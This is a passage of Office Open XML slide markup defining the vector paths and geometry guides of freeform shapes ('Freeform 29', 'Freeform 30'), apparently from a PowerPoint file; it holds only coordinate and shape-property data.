                  <a:gd name="T61" fmla="*/ 305 h 752"/>
                  <a:gd name="T62" fmla="*/ 404 w 678"/>
                  <a:gd name="T63" fmla="*/ 279 h 752"/>
                  <a:gd name="T64" fmla="*/ 482 w 678"/>
                  <a:gd name="T65" fmla="*/ 273 h 752"/>
                  <a:gd name="T66" fmla="*/ 545 w 678"/>
                  <a:gd name="T67" fmla="*/ 284 h 752"/>
                  <a:gd name="T68" fmla="*/ 593 w 678"/>
                  <a:gd name="T69" fmla="*/ 316 h 752"/>
                  <a:gd name="T70" fmla="*/ 629 w 678"/>
                  <a:gd name="T71" fmla="*/ 363 h 752"/>
                  <a:gd name="T72" fmla="*/ 677 w 678"/>
                  <a:gd name="T73" fmla="*/ 504 h 752"/>
                  <a:gd name="T74" fmla="*/ 651 w 678"/>
                  <a:gd name="T75" fmla="*/ 583 h 752"/>
                  <a:gd name="T76" fmla="*/ 540 w 678"/>
                  <a:gd name="T77" fmla="*/ 693 h 752"/>
                  <a:gd name="T78" fmla="*/ 441 w 678"/>
                  <a:gd name="T79" fmla="*/ 740 h 752"/>
                  <a:gd name="T80" fmla="*/ 357 w 678"/>
                  <a:gd name="T81" fmla="*/ 746 h 752"/>
                  <a:gd name="T82" fmla="*/ 251 w 678"/>
                  <a:gd name="T83" fmla="*/ 683 h 752"/>
                  <a:gd name="T84" fmla="*/ 331 w 678"/>
                  <a:gd name="T85" fmla="*/ 541 h 7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678" h="752">
                    <a:moveTo>
                      <a:pt x="346" y="557"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="346" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="566" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="725"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="740"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="746"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="746"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="735"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="557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3" name="Freeform 29"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3689350" y="1428750"/>
                <a:ext cx="184150" cy="211138"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 226 w 511"/>
                  <a:gd name="T1" fmla="*/ 384 h 585"/>
                  <a:gd name="T2" fmla="*/ 252 w 511"/>
                  <a:gd name="T3" fmla="*/ 426 h 585"/>
                  <a:gd name="T4" fmla="*/ 284 w 511"/>
                  <a:gd name="T5" fmla="*/ 457 h 585"/>
                  <a:gd name="T6" fmla="*/ 315 w 511"/>
                  <a:gd name="T7" fmla="*/ 473 h 585"/>
                  <a:gd name="T8" fmla="*/ 331 w 511"/>
                  <a:gd name="T9" fmla="*/ 473 h 585"/>
                  <a:gd name="T10" fmla="*/ 347 w 511"/>
                  <a:gd name="T11" fmla="*/ 463 h 585"/>
                  <a:gd name="T12" fmla="*/ 373 w 511"/>
                  <a:gd name="T13" fmla="*/ 441 h 585"/>
                  <a:gd name="T14" fmla="*/ 384 w 511"/>
                  <a:gd name="T15" fmla="*/ 415 h 585"/>
                  <a:gd name="T16" fmla="*/ 378 w 511"/>
                  <a:gd name="T17" fmla="*/ 378 h 585"/>
                  <a:gd name="T18" fmla="*/ 478 w 511"/>
                  <a:gd name="T19" fmla="*/ 273 h 585"/>
                  <a:gd name="T20" fmla="*/ 494 w 511"/>
                  <a:gd name="T21" fmla="*/ 316 h 585"/>
                  <a:gd name="T22" fmla="*/ 510 w 511"/>
                  <a:gd name="T23" fmla="*/ 394 h 585"/>
                  <a:gd name="T24" fmla="*/ 504 w 511"/>
                  <a:gd name="T25" fmla="*/ 426 h 585"/>
                  <a:gd name="T26" fmla="*/ 467 w 511"/>
                  <a:gd name="T27" fmla="*/ 494 h 585"/>
                  <a:gd name="T28" fmla="*/ 399 w 511"/>
                  <a:gd name="T29" fmla="*/ 547 h 585"/>
                  <a:gd name="T30" fmla="*/ 363 w 511"/>
                  <a:gd name="T31" fmla="*/ 562 h 585"/>
                  <a:gd name="T32" fmla="*/ 305 w 511"/>
                  <a:gd name="T33" fmla="*/ 584 h 585"/>
                  <a:gd name="T34" fmla="*/ 279 w 511"/>
                  <a:gd name="T35" fmla="*/ 584 h 585"/>
                  <a:gd name="T36" fmla="*/ 231 w 511"/>
                  <a:gd name="T37" fmla="*/ 573 h 585"/>
                  <a:gd name="T38" fmla="*/ 190 w 511"/>
                  <a:gd name="T39" fmla="*/ 557 h 585"/>
                  <a:gd name="T40" fmla="*/ 153 w 511"/>
                  <a:gd name="T41" fmla="*/ 525 h 585"/>
                  <a:gd name="T42" fmla="*/ 121 w 511"/>
                  <a:gd name="T43" fmla="*/ 484 h 585"/>
                  <a:gd name="T44" fmla="*/ 63 w 511"/>
                  <a:gd name="T45" fmla="*/ 394 h 585"/>
                  <a:gd name="T46" fmla="*/ 16 w 511"/>
                  <a:gd name="T47" fmla="*/ 294 h 585"/>
                  <a:gd name="T48" fmla="*/ 6 w 511"/>
                  <a:gd name="T49" fmla="*/ 247 h 585"/>
                  <a:gd name="T50" fmla="*/ 0 w 511"/>
                  <a:gd name="T51" fmla="*/ 200 h 585"/>
                  <a:gd name="T52" fmla="*/ 6 w 511"/>
                  <a:gd name="T53" fmla="*/ 153 h 585"/>
                  <a:gd name="T54" fmla="*/ 26 w 511"/>
                  <a:gd name="T55" fmla="*/ 111 h 585"/>
                  <a:gd name="T56" fmla="*/ 43 w 511"/>
                  <a:gd name="T57" fmla="*/ 90 h 585"/>
                  <a:gd name="T58" fmla="*/ 90 w 511"/>
                  <a:gd name="T59" fmla="*/ 53 h 585"/>
                  <a:gd name="T60" fmla="*/ 116 w 511"/>
                  <a:gd name="T61" fmla="*/ 32 h 585"/>
                  <a:gd name="T62" fmla="*/ 194 w 511"/>
                  <a:gd name="T63" fmla="*/ 0 h 585"/>
                  <a:gd name="T64" fmla="*/ 216 w 511"/>
                  <a:gd name="T65" fmla="*/ 0 h 585"/>
                  <a:gd name="T66" fmla="*/ 300 w 511"/>
                  <a:gd name="T67" fmla="*/ 22 h 585"/>
                  <a:gd name="T68" fmla="*/ 337 w 511"/>
                  <a:gd name="T69" fmla="*/ 48 h 585"/>
                  <a:gd name="T70" fmla="*/ 367 w 511"/>
                  <a:gd name="T71" fmla="*/ 84 h 585"/>
                  <a:gd name="T72" fmla="*/ 436 w 511"/>
                  <a:gd name="T73" fmla="*/ 179 h 585"/>
                  <a:gd name="T74" fmla="*/ 200 w 511"/>
                  <a:gd name="T75" fmla="*/ 347 h 585"/>
                  <a:gd name="T76" fmla="*/ 257 w 511"/>
                  <a:gd name="T77" fmla="*/ 153 h 585"/>
                  <a:gd name="T78" fmla="*/ 242 w 511"/>
                  <a:gd name="T79" fmla="*/ 137 h 585"/>
                  <a:gd name="T80" fmla="*/ 226 w 511"/>
                  <a:gd name="T81" fmla="*/ 121 h 585"/>
                  <a:gd name="T82" fmla="*/ 194 w 511"/>
                  <a:gd name="T83" fmla="*/ 111 h 585"/>
                  <a:gd name="T84" fmla="*/ 179 w 511"/>
                  <a:gd name="T85" fmla="*/ 111 h 585"/>
                  <a:gd name="T86" fmla="*/ 158 w 511"/>
                  <a:gd name="T87" fmla="*/ 121 h 585"/>
                  <a:gd name="T88" fmla="*/ 131 w 511"/>
                  <a:gd name="T89" fmla="*/ 147 h 585"/>
                  <a:gd name="T90" fmla="*/ 126 w 511"/>
                  <a:gd name="T91" fmla="*/ 163 h 585"/>
                  <a:gd name="T92" fmla="*/ 126 w 511"/>
                  <a:gd name="T93" fmla="*/ 179 h 585"/>
                  <a:gd name="T94" fmla="*/ 131 w 511"/>
                  <a:gd name="T95" fmla="*/ 216 h 585"/>
                  <a:gd name="T96" fmla="*/ 163 w 511"/>
                  <a:gd name="T97" fmla="*/ 273 h 585"/>
                  <a:gd name="T98" fmla="*/ 289 w 511"/>
                  <a:gd name="T99" fmla="*/ 200 h 5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11" h="585">
                    <a:moveTo>
                      <a:pt x="226" y="384"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="226" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="384"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="257" y="153"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="257" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="153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" name="Freeform 30"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3849688" y="1347788"/>
                <a:ext cx="177800" cy="212725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 257 w 494"/>
                  <a:gd name="T1" fmla="*/ 157 h 589"/>
                  <a:gd name="T2" fmla="*/ 236 w 494"/>
                  <a:gd name="T3" fmla="*/ 126 h 589"/>
                  <a:gd name="T4" fmla="*/ 204 w 494"/>
                  <a:gd name="T5" fmla="*/ 110 h 589"/>
                  <a:gd name="T6" fmla="*/ 188 w 494"/>
                  <a:gd name="T7" fmla="*/ 110 h 589"/>
                  <a:gd name="T8" fmla="*/ 173 w 494"/>
                  <a:gd name="T9" fmla="*/ 115 h 589"/>
                  <a:gd name="T10" fmla="*/ 136 w 494"/>
                  <a:gd name="T11" fmla="*/ 147 h 589"/>
                  <a:gd name="T12" fmla="*/ 131 w 494"/>
                  <a:gd name="T13" fmla="*/ 168 h 589"/>
                  <a:gd name="T14" fmla="*/ 131 w 494"/>
                  <a:gd name="T15" fmla="*/ 189 h 589"/>
                  <a:gd name="T16" fmla="*/ 147 w 494"/>
                  <a:gd name="T17" fmla="*/ 247 h 589"/>
                  <a:gd name="T18" fmla="*/ 178 w 494"/>
                  <a:gd name="T19" fmla="*/ 325 h 589"/>
                  <a:gd name="T20" fmla="*/ 220 w 494"/>
                  <a:gd name="T21" fmla="*/ 404 h 589"/>
                  <a:gd name="T22" fmla="*/ 236 w 494"/>
                  <a:gd name="T23" fmla="*/ 430 h 589"/>
                  <a:gd name="T24" fmla="*/ 257 w 494"/>
                  <a:gd name="T25" fmla="*/ 456 h 589"/>
                  <a:gd name="T26" fmla="*/ 294 w 494"/>
                  <a:gd name="T27" fmla="*/ 478 h 589"/>
                  <a:gd name="T28" fmla="*/ 309 w 494"/>
                  <a:gd name="T29" fmla="*/ 478 h 589"/>
                  <a:gd name="T30" fmla="*/ 331 w 494"/>
                  <a:gd name="T31" fmla="*/ 467 h 589"/>
                  <a:gd name="T32" fmla="*/ 357 w 494"/>
                  <a:gd name="T33" fmla="*/ 446 h 589"/>
                  <a:gd name="T34" fmla="*/ 367 w 494"/>
                  <a:gd name="T35" fmla="*/ 420 h 589"/>
                  <a:gd name="T36" fmla="*/ 367 w 494"/>
                  <a:gd name="T37" fmla="*/ 398 h 589"/>
                  <a:gd name="T38" fmla="*/ 341 w 494"/>
                  <a:gd name="T39" fmla="*/ 320 h 589"/>
                  <a:gd name="T40" fmla="*/ 461 w 494"/>
                  <a:gd name="T41" fmla="*/ 262 h 589"/>
                  <a:gd name="T42" fmla="*/ 493 w 494"/>
                  <a:gd name="T43" fmla="*/ 357 h 589"/>
                  <a:gd name="T44" fmla="*/ 488 w 494"/>
                  <a:gd name="T45" fmla="*/ 435 h 589"/>
                  <a:gd name="T46" fmla="*/ 472 w 494"/>
                  <a:gd name="T47" fmla="*/ 472 h 589"/>
                  <a:gd name="T48" fmla="*/ 414 w 494"/>
                  <a:gd name="T49" fmla="*/ 530 h 589"/>
                  <a:gd name="T50" fmla="*/ 367 w 494"/>
                  <a:gd name="T51" fmla="*/ 556 h 589"/>
                  <a:gd name="T52" fmla="*/ 278 w 494"/>
                  <a:gd name="T53" fmla="*/ 588 h 589"/>
                  <a:gd name="T54" fmla="*/ 236 w 494"/>
                  <a:gd name="T55" fmla="*/ 582 h 589"/>
                  <a:gd name="T56" fmla="*/ 194 w 494"/>
                  <a:gd name="T57" fmla="*/ 572 h 589"/>
                  <a:gd name="T58" fmla="*/ 120 w 494"/>
                  <a:gd name="T59" fmla="*/ 509 h 589"/>
